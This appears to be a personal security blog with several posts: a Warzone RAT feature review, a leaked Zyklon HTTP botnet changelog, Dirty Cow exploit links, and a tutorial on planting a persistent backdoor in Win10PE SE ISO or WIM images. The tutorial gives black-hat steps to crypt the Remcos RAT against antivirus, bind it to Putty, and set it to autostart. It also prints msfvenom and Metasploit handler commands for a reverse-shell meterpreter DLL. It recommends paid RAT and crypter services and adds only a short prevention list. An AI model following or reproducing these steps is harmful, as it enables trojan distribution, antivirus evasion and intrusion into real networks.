Cyber War and APT

Thursday, May 9, 2019

Warzone RAT 1.89 as of May 9th 2019 Not a bad RAT

This rat has UAC bypass that works as May 9th 2019 on windows 7-10. It makes a windows defender exclusion for its self. It has a working password recovery program for Firefox and Edge and Chrome. It has a keylogger. It has regular VNC. Hidden RDP for machines that have used rdp and is silent on Windows 7 but not on Windows 10 Windows 10 will prompt the user saying their is an rdp request. It has a remote shell, a process manager, remote webcam viewer, reverse socks.

Thursday, August 17, 2017

Zyklon HTTP leaked version 1.3.0.1 Updated version has native loader

Zyklon HTTP leaked version 1.3.0.1 leaked on opensc forum and other forums. The leaked version of the bot I tested in a virtual machine appears to be backdoored as you can't successfully uninstall the bot without it coming online a few minutes later. The newest version I am currently aware of version 1.4.0.0 boasts of a native loader without the need for .NET which is a huge deal considering it's accessible price point at around $125.00 with option for 3 .onion domains

Zyklon HTTP Change Log

v1.4.0.0

-Added on connect tasks [You are now able to create tasks that will execute as soon as the client is first seen in the panel]

-Task execution is now faster [No more delays when executing multiple tasks]

-Native loader is completely recoded

-Added UAC bypass

-Botkiller module optimized

-Better persistence [System wide injection only for x86 processes for now]

-Tor is no longer injected and instead is run in the address space of current executable

-Tor updated to newer version

-Added option to choose if you want to run Zyklon H.T.T.P main process in the address space of system process

-Downloaded plugins are now stored encrypted with key derived from machine hwid and with file name dervied from machine hwid [No more filename based detections]

-Added support for https links when downloading files

-Normal version file size is reduced to less than 200kb

-Better crypter compatibility

-Added new filters in the panel when creating new tasks

-Various panel bugfixes and improvements

-The client now connects to index.php instead of gate.php

v1.3.0.0

-Added native loader [The bot now works on all .NET framework versions, persistence works even if there is no .NET framework installed]

-Improved stability

-Auto logout after 10min of inactivity in the panel

-Keylogger added

-Reverse socks proxy added

-Miner removed

-Fixed bug with UDP flood where port was always 80

-Added automatic updater to make easier to update your clients

-Added download files over tor

-Added update on the fly [Zyklon H.T.T.P will just download the file from specified link and replace the installed file.]

-Added option to create cron jobs in the installer

-World map can show only online or all clients.

-Added help page with some explanations [More will come in the future]

-Added a % next to a numbers in the statistics page

-Added options to check keylogger logs and recovered browser passwords when you click client IP

-Panel now sanitize all user input variables before displaying them to the end user

-Fixed bug where the submenu would collapse when the page was selected

-Optimized persistence module

-Added option to download tor from the server using tor2web and simillar proxy. [Tor version stub size reduced from 1.3mb to 280kb]

-Added few new database options

-Fixed the bug where you could put string as parameters in knock time, offlline time, dead time and botkiller cycle.

-Fixed the bug with cloud based malware inspection where api key were not set correctly.

-Limited cloud based malware inspection only to startup items [This is because VT allows only 4 requests per minute using one api]

-Fixed the issue with downloading logs on some systems.

-Changed the way the settings were passed to the client. The client receives the new settings as soon they are applied in the panel. No need to wait for restart.

-Various other code optimizations and small bugfixes

v1.2.0.0

-Added option to change socks proxy port in the panel

-Botkiller Optimized

-Improved stability

-Password recovery module updated

-Added a few new database options in the panel

-Various bugs fixes and minor code changes

-Tor module optimized, faster connection to the Tor network

-Added option to group clients

v1.1.0.0

-Added Tor support [Nothing is dropped or downloaded]

-Added Botkiller [It will detect injected processes]

-Client basecode optimized

-Added various new options in the panel

-Updated password recovery for newest Mozilla Firefox and various other software.

-CloudFlare support added

v1.0.1.0

-Improved persistence [The bot now injects watchdog threads into other processes that protect the main process, startup regkeys/files and main file]

-Improved crypter compatibility

-Fixed a bug where bot was not uninstalling correctly

-Socks5 proxy optimized for better performance

-Added multiple startup methods

v1.0.0.0

-Initial Release

Monday, October 31, 2016

Dirty Cow CVE-2016-5195 Exploit on Ubuntu 16.04

https://dirtycow.ninja/
https://www.exploit-db.com/exploits/40616/

Tuesday, October 25, 2016

Cobalt Strike Trial 3.5.1 Browser Pivot

Wednesday, October 12, 2016

Persistent Backdooring Win10PE SE ISO or WIM

My goal was to create a persistent backdoor on a small business or corporate network. Using Win10PE SE build on either an ISO or WIM file within the skill level of any attacker. I chose to use REMCOS rat. REMCOS is RAT used for good and bad it’s a tool it often is used by blackhats and at a price of only 60.00 a month it’s worth the cost. http://breaking-security.net/remcos.php

Also, Anti-Analysis can prolong the life of your backdoor.

I choose Octopus crypter/binder (crypter tools to evade anti-virus detection) to bind (bind to attach a virus to legitimate program which executes the legitimate program and the rat server simultaneously) Putty as an example of a trusted program. As for crypters, you can use old free crypters or you can get something modern with a private stub giving you months without detection.

http://breaking-security.net/octopus.php

Note most of the functions work on REMCOS notably the file manager and dll injection. I tested metasploits meterpreter rat by injecting dll payload meterpreter.dll. I found not only did meterpeter work but it was also possible to pivot off the Windows 10 PE SE live ISO file or WIM. The pivot allows the attacker to enumerate and exploit machines on any other networks connected to the machine running the Windows 10PE SE ISO or WIM.

https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

https://www.offensive-security.com/metasploit-unleashed/portfwd/

I tested Empire and successfully injected dll payload Empire.dll

http://www.powershellempire.com/?page_id=135

An attacker could spread a backdoored windows10PE SE ISO or WIM through social engineering or using existing access if the person happens to be inside threat. This threat could probably fly under the radar for a while giving an attacker sporadic access to the network this attack probably is only useful if the victim frequently uses the backdoored ISO or WIM (A file which can be setup to boot off the network) http://www.howtogeek.com/162070/it-geek-how-to-network-boot-pxe-the-winpe-recovery-disk-with-pxelinux-v5-wimboot/

Effects of a persistent backdoor trojan

1. An attacker can now access any drive mounted on the infected computer this can be used to bind your bot or rat to a persistent mounted hard drive with an OS mounted on it provided the file system is not encrypted programs on the mounted drive hard drive.

2. An attacker could load metasploits meterpreter tool to pivot to attack another machine on a private network.

3. A trojan could last undected by av for a long time months if the attacker is willing to get private stub for encrypting this could be done with just $100.00

What can be done to prevent it

1. Don’t trust sites that are not well known for “free” compiled ISOS or WIMS malware-fighting tools

2. Look to see if there are any Untrusted programs in AppsMy when building your ISO or WIM

3. After building ISO scan the ISO for malware with Kaspersky or Bitdefender

4. Check MD5 hashes to see if a tool has been modified by a binder/crypter

http://www.winmd5.com/

Step by Step from a black hat perspective

1. Crypt your RAT and bind it to Putty.exe example using Octopus 2.3.2

2. Check your file for detection https://nodistribute.com

3.You can create Windows 10 PE ISO or WIM with WinBuilder

I used Windows 10 Enterprise 2015 LTSB Evaluation trial for the ISO or WIM

Link for WinBuilder http://win10se.cwcodes.net/Compressed/

Launch the WinBuilder

a. Click under Utils to PC Packed

b. Add backdoor BadPutty to a zip file BadPutty.zip

c. Name the backdoor executable in the zip file above BadPutty.exe

1. Click AppsMy

a. Click 2Prepare

b. Click BadPutty

c. Only select startup

4. Boot your win10PE SE ISO or WIM file Putty will automatically load and execute Putty and the RAT binded to it.

Create a dll payload meterpreter.dll in Kali

example

root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.202.133 LPORT=1337 -b "\x00" -e x86/shikata_ga_nai -f dll -o /root/Desktop/Meterpreter.dll

handler first enter metapsloit in Kali

root@kali:~# msfconsole

use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.202.133

msf exploit(handler) > set LPORT 1337

msf exploit(handler) > exploit -j

Create a dll payload Empire.dll tested in Kali

https://www.powershellempire.com/?page_id=135

Load your dll payload into memory with Remcos